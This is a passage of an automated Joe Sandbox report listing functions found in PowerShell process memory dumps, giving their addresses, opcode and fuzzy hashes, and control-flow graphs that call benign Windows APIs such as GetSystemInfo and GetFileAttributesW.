                                                                                                                  • Instruction Fuzzy Hash: 8CF0BE7190868E9FCF06DFA888041EEBFB0FF9A214F0501ABE008E2152C6695014C7A1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB83A28 Relevance: .0, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6aa9c6eba571bb18ad23f909c49421634bfa73f1f313561d08fcc67dcdd415a2
                                                                                                                  • Instruction ID: 89cc442ea40f93349b8cbdca6eb338702cea134da6ea564a179ff7954af0886d
                                                                                                                  • Opcode Fuzzy Hash: 6aa9c6eba571bb18ad23f909c49421634bfa73f1f313561d08fcc67dcdd415a2
                                                                                                                  • Instruction Fuzzy Hash: E4E0E53260C75607EB44DA1CE4003E97BC1FB883A4F44063EE589E7395DDA5AA848381
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB92B15 Relevance: .0, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7bd1be17fa22c0e2ece4ed65c9ee4d41f40f17317a20310ebd7dc7eef332ba89
                                                                                                                  • Instruction ID: 53d5da65fce8a3bba8bf6d5db3da3b021ddc1010ba3052eb3e58af4e3773ec60
                                                                                                                  • Opcode Fuzzy Hash: 7bd1be17fa22c0e2ece4ed65c9ee4d41f40f17317a20310ebd7dc7eef332ba89
                                                                                                                  • Instruction Fuzzy Hash: C0E02220C2DA960FE769EA2C40667B87AD0FF05300F4400FEC24CCB1E2D8C9BE448381
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB83A30 Relevance: .0, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fcde87329f65c93570b78b640274e4692f9f9592b5c369efb22595a86b98d332
                                                                                                                  • Instruction ID: 266ae0ddd11d7af9b98fac48282703ce6e44cb5909d3b59e80d8728bab61f54a
                                                                                                                  • Opcode Fuzzy Hash: fcde87329f65c93570b78b640274e4692f9f9592b5c369efb22595a86b98d332
                                                                                                                  • Instruction Fuzzy Hash: 44E0D83120871507DB44D51CE4047AA77D5DBC8365F44063EF849E3395DDA59A8443C1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB96535 Relevance: .0, Instructions: 24COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8df28a38535416ab55d976b9b5de4f1f422d1f5fb115ae5e1d7f59e51dda3e78
                                                                                                                  • Instruction ID: 0e6745d30be089b95499dfeddd5663104746938e9789f37fd780ce7d2bacfe05
                                                                                                                  • Opcode Fuzzy Hash: 8df28a38535416ab55d976b9b5de4f1f422d1f5fb115ae5e1d7f59e51dda3e78
                                                                                                                  • Instruction Fuzzy Hash: DED017209496854FC706A7398C944503FB0EF6B21079A00E2D484CB1B3D55E9D9A8752
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA06FCE Relevance: .0, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a5aa5c09dd3af6c293efb7ab5936a62cde06f368cfead138865743d7433fa60b
                                                                                                                  • Instruction ID: f96d8d0365edb5433ccc0e51ca885b6629f877ab6539c57ac40cbc283a574238
                                                                                                                  • Opcode Fuzzy Hash: a5aa5c09dd3af6c293efb7ab5936a62cde06f368cfead138865743d7433fa60b
                                                                                                                  • Instruction Fuzzy Hash: E0E0EC31E09A0A8BDB95EF2CA0212E97391FF85705F900579D21DC62D2CE7AF9168740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA1330E Relevance: .0, Instructions: 16COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 162fd4c20e8d955e6a80c388eaa51e77631f5fcf901d833508329f51a4a2d543
                                                                                                                  • Instruction ID: 3fe5b9133261489b781daee63b5ef7b9a0ebc714caabe14a3e65ab13024c5aea
                                                                                                                  • Opcode Fuzzy Hash: 162fd4c20e8d955e6a80c388eaa51e77631f5fcf901d833508329f51a4a2d543
                                                                                                                  • Instruction Fuzzy Hash: 45D0C932A0450E8A9E54EE88A851AE9B355FB91265B410676D61A821D1CE517912C744
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB25017A Relevance: .0, Instructions: 10COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2083437579.00007FF9BB250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB250000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb250000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7b8a5b968dab46b550b41b6f14d50ba84e6397c2cc8d93c8eb0312f3b76c047e
                                                                                                                  • Instruction ID: 910ccc56a70497f0963728f355ead5bc011d46885283fcde53ba8adcc7d4626a
                                                                                                                  • Opcode Fuzzy Hash: 7b8a5b968dab46b550b41b6f14d50ba84e6397c2cc8d93c8eb0312f3b76c047e
                                                                                                                  • Instruction Fuzzy Hash: 0DB09214649C290A9A94E34DB8826E82381D748710B4510A5E928C2286C948AE8227C9
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FF9BB775D11 Relevance: 20.4, Strings: 16, Instructions: 414COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2126238344.00007FF9BB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB770000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb770000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +$.$E$G$K$M$P$T$X$e$g$k$m$p$t$x
                                                                                                                  • API String ID: 0-691191535
                                                                                                                  • Opcode ID: e5382a3d0d7ab7bb9b48544d9a21d052973cea48931af04a00789317d4cbc218
                                                                                                                  • Instruction ID: 31c1e26264029489e9ea607dce962372e823c51e28e978cdb89947ad6dacbef8
                                                                                                                  • Opcode Fuzzy Hash: e5382a3d0d7ab7bb9b48544d9a21d052973cea48931af04a00789317d4cbc218
                                                                                                                  • Instruction Fuzzy Hash: EBC11531A0C6454EE768AF1D94813BD36D1FF9A310F14007DE98EC26F3DDADBA428286
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB412D5E Relevance: 6.4, Strings: 5, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *$?$[$]$`
                                                                                                                  • API String ID: 0-4132509962
                                                                                                                  • Opcode ID: 0d28f1317a436c514d324d58755316afe5e96cc9141994f55550454f13db6f4c
                                                                                                                  • Instruction ID: c56fb6f169f1603e5a46caed1127903ad40b2d16edb487f2c572602305bf3875
                                                                                                                  • Opcode Fuzzy Hash: 0d28f1317a436c514d324d58755316afe5e96cc9141994f55550454f13db6f4c
                                                                                                                  • Instruction Fuzzy Hash: 76413825D1CB5A0AE729CF2C54822747B82FF92711B5542BED6CBC34E2ED59B8474281
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:54
                                                                                                                  Total number of Limit Nodes:3
                                                                                                                  execution_graph 47479 7ff9baf5395d 47481 7ff9baf5397b IdentifyCodeAuthzLevelW 47479->47481 47482 7ff9baf53ade 47481->47482 47509 7ff9baf4ef50 47510 7ff9baf4ef5d 47509->47510 47513 7ff9baf4d258 47510->47513 47512 7ff9baf4f2ec 47514 7ff9baf52660 47513->47514 47515 7ff9baf5270f 47514->47515 47517 7ff9baf4d260 47514->47517 47515->47512 47518 7ff9baf528b0 47517->47518 47520 7ff9baf528cf 47518->47520 47521 7ff9baf4d278 47518->47521 47520->47515 47522 7ff9baf532b0 47521->47522 47523 7ff9baf532eb 47522->47523 47524 7ff9baf534e3 47522->47524 47528 7ff9baf5348b 47523->47528 47530 7ff9baf53323 47523->47530 47531 7ff9baf4d288 ComputeAccessTokenFromCodeAuthzLevel IdentifyCodeAuthzLevelW 47523->47531 47525 7ff9baf42030 2 API calls 47524->47525 47526 7ff9baf534e8 47525->47526 47526->47520 47532 7ff9baf53681 ComputeAccessTokenFromCodeAuthzLevel IdentifyCodeAuthzLevelW 47528->47532 47530->47520 47531->47528 47532->47530 47487 7ff9baf536b9 47488 7ff9baf536d3 47487->47488 47493 7ff9baf42030 47488->47493 47491 7ff9baf5375e 47492 7ff9baf42030 2 API calls 47492->47491 47494 7ff9baf53780 47493->47494 47496 7ff9baf53837 47494->47496 47500 7ff9baf4a050 47494->47500 47499 7ff9baf538f4 47496->47499 47504 7ff9baf5392f 47496->47504 47498 7ff9baf5374f 47498->47491 47498->47492 47501 7ff9baf4a059 ComputeAccessTokenFromCodeAuthzLevel 47500->47501 47503 7ff9baf55e6e 47501->47503 47503->47496 47505 7ff9baf5393a 47504->47505 47506 7ff9baf53982 IdentifyCodeAuthzLevelW 47504->47506 47505->47498 47508 7ff9baf53ade 47506->47508 47508->47498 47533 7ff9baf56755 47535 7ff9baf567b3 47533->47535 47536 7ff9baf44938 47533->47536 47537 7ff9baf56a60 47536->47537 47538 7ff9baf56b23 GetSystemInfo 47537->47538 47540 7ff9baf56a90 47537->47540 47539 7ff9baf56b5e 47538->47539 47539->47535 47540->47535 47483 7ff9baf48f11 47484 7ff9baf48f1f GetFileAttributesW 47483->47484 47486 7ff9baf48fc6 47484->47486 47541 7ff9baf478d5 47542 7ff9baf47928 47541->47542 47544 7ff9baf4794a 47541->47544 47545 7ff9baf46760 47542->47545 47546 7ff9baf46769 GetThreadPreferredUILanguages 47545->47546 47548 7ff9baf47e7a 47546->47548 47548->47544

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF9BBB093A2 Relevance: .6, Instructions: 596COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27a1b413da118f79ba6d9af13c64f96b17663675eee82bd54d27a553afed4c02
                                                                                                                  • Instruction ID: 1d7ccb847a34691c5849b3b8d945bbdd46185ed566c5c95cb61fd3cd8a9d659a
                                                                                                                  • Opcode Fuzzy Hash: 27a1b413da118f79ba6d9af13c64f96b17663675eee82bd54d27a553afed4c02
                                                                                                                  • Instruction Fuzzy Hash: 85028221A1CE494FE798EB2C94557B9B3D2FF99310F51857EE04EC32E7DE28A8418B41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB093C5 Relevance: .6, Instructions: 562COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 58323d8f8704da93cdc70e2fe3331203671027de19b58cf9463caba922c8750a
                                                                                                                  • Instruction ID: 2d78f0239f85a6e7e98a1a27ea63a4ed8703b83d4b33586338b26c89969d2e3c
                                                                                                                  • Opcode Fuzzy Hash: 58323d8f8704da93cdc70e2fe3331203671027de19b58cf9463caba922c8750a
                                                                                                                  • Instruction Fuzzy Hash: 8902A121A1CE494FE798EB2C94557B9B7D2FF99310F5181BEE04EC32E7DE28A8418741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB04B9D Relevance: .5, Instructions: 471COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b62d2d82db376d75580be9d27ccbd1f09a13bf2d1e78fae0328385f2bbfe3143
                                                                                                                  • Instruction ID: 786c0ee5801e51db965c79cc7e3e86e549fefe136dc488164055d45ace3444a6
                                                                                                                  • Opcode Fuzzy Hash: b62d2d82db376d75580be9d27ccbd1f09a13bf2d1e78fae0328385f2bbfe3143
                                                                                                                  • Instruction Fuzzy Hash: 58E17E30A08A5A4FEB98EF2C94557B977E2FF98710F5401B9E50DC72E2DE68F9428740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF5392F Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 990204bcc0939990d267da34be66700ba4f39a0943568569b5babfb05a8899a9
                                                                                                                  • Instruction ID: e4c2e5b18c88e1f10b282ed0fa08029900bc8f0b8769da863fb1c2ce0c6cc21d
                                                                                                                  • Opcode Fuzzy Hash: 990204bcc0939990d267da34be66700ba4f39a0943568569b5babfb05a8899a9
                                                                                                                  • Instruction Fuzzy Hash: BD51AF31908A1C8FDBA9DB19D845BE9B7F0FB99311F0042EAD54DE3251DE70AA858F81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF5395D Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 436 7ff9baf5395d-7ff9baf53979 437 7ff9baf5397b 436->437 438 7ff9baf5397c-7ff9baf53a71 436->438 437->438 443 7ff9baf53a7e-7ff9baf53adc IdentifyCodeAuthzLevelW 438->443 444 7ff9baf53a73-7ff9baf53a7b 438->444 445 7ff9baf53ade 443->445 446 7ff9baf53ae4-7ff9baf53b38 call 7ff9baf53b39 443->446 444->443 445->446
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1431151113-0
                                                                                                                  • Opcode ID: 3f04ef5916af2d62932362558ca0cf0b34dca81e8675bbeb780676cbacf38f78
                                                                                                                  • Instruction ID: a2b7243dea64c24bfd7258e1e7f9f449d0d3a3a05fa03ace1e6c62314c11fd67
                                                                                                                  • Opcode Fuzzy Hash: 3f04ef5916af2d62932362558ca0cf0b34dca81e8675bbeb780676cbacf38f78
                                                                                                                  • Instruction Fuzzy Hash: 5851C031908A1C4FDBA9DB18DC557E9B7F1FB99311F0042EBD44DE3252CA74AA858F81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF4A040 Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 034c7f5c44e2a890a97b1cb2582a6e28ad853a6f616dc7b912b12faa9124c442
                                                                                                                  • Instruction ID: 7d977cc951323b43bb884520db20df32c33006952fefe2b0902e317c411df9f4
                                                                                                                  • Opcode Fuzzy Hash: 034c7f5c44e2a890a97b1cb2582a6e28ad853a6f616dc7b912b12faa9124c442
                                                                                                                  • Instruction Fuzzy Hash: 4C51C131908A1C8FDBA9DB09DC457E9B7F1FB68311F0082EAD54DE3251DE74AA858F81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF47D6E Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 463 7ff9baf47d6e-7ff9baf47d7b 464 7ff9baf47d7d-7ff9baf47d85 463->464 465 7ff9baf47d86-7ff9baf47d97 463->465 464->465 466 7ff9baf47d99-7ff9baf47da1 465->466 467 7ff9baf47da2-7ff9baf47e2f 465->467 466->467 471 7ff9baf47e39-7ff9baf47e78 GetThreadPreferredUILanguages 467->471 472 7ff9baf47e31-7ff9baf47e36 467->472 473 7ff9baf47e7a 471->473 474 7ff9baf47e80-7ff9baf47eab 471->474 472->471 473->474
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LanguagesPreferredThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 842807343-0
                                                                                                                  • Opcode ID: bfe7b2badca8d57f89e1141e618ca9551bab33df68bc35b74cd4cf512cc92130
                                                                                                                  • Instruction ID: 85667bb058f851b32c78d3217e6fafc8e05354ae053b99e8b6dd24e4911eaa06
                                                                                                                  • Opcode Fuzzy Hash: bfe7b2badca8d57f89e1141e618ca9551bab33df68bc35b74cd4cf512cc92130
                                                                                                                  • Instruction Fuzzy Hash: 3E41E43090CA888FEB19DB6998057F9BBF1EB56321F0442AFD049D31A2DF746856CB91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF44938 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 31276548-0
                                                                                                                  • Opcode ID: 232c0ca2d7c251da9b43a90e5dbbce2b66f527e31c697c50ff009cd17867b852
                                                                                                                  • Instruction ID: 69c792d62c172a7777d6f5b163c4a5b10dcb057f93eee04057c2e488d324fcb8
                                                                                                                  • Opcode Fuzzy Hash: 232c0ca2d7c251da9b43a90e5dbbce2b66f527e31c697c50ff009cd17867b852
                                                                                                                  • Instruction Fuzzy Hash: 0741E13190CA0C4FEB98DBA988457F97BE1EB95321F04426AD049C3291EBB4B5568B81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF46760 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 497 7ff9baf46760-7ff9baf47e2f 502 7ff9baf47e39-7ff9baf47e78 GetThreadPreferredUILanguages 497->502 503 7ff9baf47e31-7ff9baf47e36 497->503 504 7ff9baf47e7a 502->504 505 7ff9baf47e80-7ff9baf47eab 502->505 503->502 504->505
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3a31f5aaf6b14be130e0f197ee667eb6779107e01690c566fc14ee574c8940fe
                                                                                                                  • Instruction ID: ac865c7cea7d18af28ce21a8a0dc26e0664c9e9b70234f3f3aad5d591d26d373
                                                                                                                  • Opcode Fuzzy Hash: 3a31f5aaf6b14be130e0f197ee667eb6779107e01690c566fc14ee574c8940fe
                                                                                                                  • Instruction Fuzzy Hash: 7A41B03190CA488FDB18DF5C98457F9B7E5FB99321F00426FD04AD3292CF74A9568B91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF4A050 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 506 7ff9baf4a050-7ff9baf4a063 508 7ff9baf4a06e 506->508 509 7ff9baf4a065-7ff9baf4a06b 506->509 510 7ff9baf55dc0-7ff9baf55e6c ComputeAccessTokenFromCodeAuthzLevel 508->510 509->510 513 7ff9baf55e6e 510->513 514 7ff9baf55e74-7ff9baf55ea3 510->514 513->514
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132034935-0
                                                                                                                  • Opcode ID: 08fb28101271609ebba6b6aefdcbe3ce0543764d32a9636022a2cc1b2bcdec80
                                                                                                                  • Instruction ID: 4ca77db28b26072cd5cea7812194e361fa858e2a8700cd9f2850bf7dd2ed34ca
                                                                                                                  • Opcode Fuzzy Hash: 08fb28101271609ebba6b6aefdcbe3ce0543764d32a9636022a2cc1b2bcdec80
                                                                                                                  • Instruction Fuzzy Hash: 3731C33190CA4C4FDB18DB5D98456F9BBE1FB5A325F00427FD04AD3252DB64A8168B81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF55DA3 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 516 7ff9baf55da3-7ff9baf55e14 519 7ff9baf55e1c-7ff9baf55e6c ComputeAccessTokenFromCodeAuthzLevel 516->519 520 7ff9baf55e6e 519->520 521 7ff9baf55e74-7ff9baf55ea3 519->521 520->521
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132034935-0
                                                                                                                  • Opcode ID: 56d5cb8154ed934c7731e2a5cae8feec3e5fef7235aa11724ae39938f8456963
                                                                                                                  • Instruction ID: 59ecdf7f2404e01b90ad5e44682adaa4199242b6ef50abaea855b92774731d21
                                                                                                                  • Opcode Fuzzy Hash: 56d5cb8154ed934c7731e2a5cae8feec3e5fef7235aa11724ae39938f8456963
                                                                                                                  • Instruction Fuzzy Hash: 0D31D23191CB584FDB48DB5DD8056F9BBF0FB9A321F0442AFD049D3292CB646816CB92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF48F11 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 523 7ff9baf48f11-7ff9baf48f1d 524 7ff9baf48f1f 523->524 525 7ff9baf48f21-7ff9baf48f5a 523->525 524->525 526 7ff9baf48f61-7ff9baf48f88 524->526 525->526 528 7ff9baf48f8a-7ff9baf48f8f 526->528 529 7ff9baf48f92-7ff9baf48fc4 GetFileAttributesW 526->529 528->529 530 7ff9baf48fcc-7ff9baf48ff1 529->530 531 7ff9baf48fc6 529->531 531->530
